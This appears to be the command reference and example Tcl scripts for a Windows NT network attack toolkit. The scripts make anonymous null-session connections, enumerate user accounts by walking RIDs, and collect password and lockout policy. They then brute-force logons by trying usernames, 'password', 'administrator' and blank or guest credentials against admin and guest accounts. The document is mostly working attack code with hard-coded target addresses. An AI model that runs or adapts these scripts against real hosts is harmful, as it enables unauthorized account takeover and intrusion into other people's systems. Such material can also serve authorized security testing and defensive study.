----------------------------------------------------------------------- # Commands NBTStatus args - IP addr of target machine IP addr of local interface output - Netbios name table on success error string on failure NTCreateAnonymousConn args - name or IP addr of target machine output - empty set on success error string on failure NTLogon args - target machine name or IP addr username comma delimited list of passwords to try output - set containing password, username, and privilege level on success set containing one string, NOT_IN_LIST, on failure NTDeleteConn args - target machine name or IP addr output - string "Deleted" on success error string on failure NTEnumUsers args - name or IP addr of target machine output - set containing usernames error strong on failure NTEnumGlobalGroups args - name or IP addr of target machine output - set containing global group names error strong on failure NTEnumLocalGroups args - name or IP addr of target machine output - set containing local group names error strong on failure NTLookupAccountSID args - name of machine (NULL for local machine)user RID output - string containing domain and username in DOMAIN\USERNAME format on success error string on failure NTUserGetInfo args - name or IP addr of the target machine username for the target account output - set containing username, password age, privilege level, comment, user flags,logon script path, auth flags, full name, and account parameters on success error string on failure NTGetPasswordPolicy args - name or IP addr of target machine output - password policy parameters NTGetMachineRole NTGetLockoutPolicy args - name or IP addr of target machine output - lockout policy parameters NTGetSAMDomain args - name or IP addr of target machine output - name of domain associated with the SAM of the machine (will the machine name on everything but domain controllers) SID for the domain NTSetRegValue args - name or IP addr of target machine registry key (must be subkey of HKEY_LOCAL_MACHINE) registry value to set (format- ::) output - string confirming value name and data on success error string on failure NTQueryServiceConfig args - name or IP addr of target machine name of service output - set containing the service display name, path to binary, start type, and user account the service is starting under NTEnumServices args - name or IP addr of target machine output - set containing the names of all the running services on success error string on failure ----------------------------------------------------------------------- # Account Brute Password set target "172.17.67.64" puts $target # lookup up to the first 2000 user accounts for {set x 1000} {$x<3000} {incr x} { NTCreateAnonymousConn $target set name [NTLookupAccountSID $target $x] if {[string length $name]} { NTDeleteConn $target set password [NTLogon $target $name {$name,password}] if {[string first "NOT_IN_LIST" $password]!=-1} { puts "Could not guess account $name password" } else { puts "Account $name has password: $password" } } NTDeleteConn $target } return ----------------------------------------------------------------------- # Infosweep for {set i 64} {$i<65} {incr i} { # replace the netID in the target string with the appropriate value set target "172.17.67.$i" puts $target # replace the loopback addr with the IP of the interface being used to reach the target set nstatus [NBTStatus $target {172.17.67.17}] puts $nstatus # create Anonymous connection to the target host, if fails continue to next IP if {[string first "ERROR" [NTCreateAnonymousConn $target]]!=-1} {continue} # get the password policy puts "Password policy parameters:" set policy [NTGetPasswordPolicy $target] puts $policy # get the account lockout params puts "Account lockout parameters:" set lockout [NTGetLockoutPolicy $target] puts $lockout # get the domain associated with the target machine's SAM set domain [NTGetSAMDomain $target] # get the machine role puts "Machine role:" set role [NTGetMachineRole $target] puts $role puts $domain puts "Users defined locally:" set users [NTEnumUsers $target] puts $users puts "Local groups:" set localgrp [NTEnumLocalGroups $target] puts $localgrp puts "Global groups:" set globalgrp [NTEnumGlobalGroups $target] puts $globalgrp # get and save name of administrator account for later use set admin [NTLookupAccountSID $target {500}] # delete the Anonymous connection NTDeleteConn $target # try admin account with "administrator" and blank passwords set password [NTLogon $target $admin {administrator,$admin,$domain,password,root}] if {[string first "NOT_IN_LIST" $password]!=-1} { puts "Could not guess admin password - trying guest account" # attempt to logon as Guest with no password and password "guest" if admin didn't work set guest [NTLogon $target {guest} {guest,$domain}] puts $guest } else { puts "Account $admin (administrator) has password $password" } } return ----------------------------------------------------------------------- # GET USER INFO set target "192.168.0.2" puts $target # create Anonymous connection to the target host NTCreateAnonymousConn $target # lookup names for the Administrator and Guest accounts for {set x 500} {$x<502} {incr x} { set name [NTLookupAccountSID $target $x] if {[string length $name]} { set info [NTUserGetInfo $target $name] puts $info } } # lookup up to the first 2000 user accounts for {set x 1000} {$x<3000} {incr x} { set name [NTLookupAccountSID $target $x] if {[string length $name]} { set info [NTUserGetInfo $target $name] puts $info } } NTDeleteConn $target return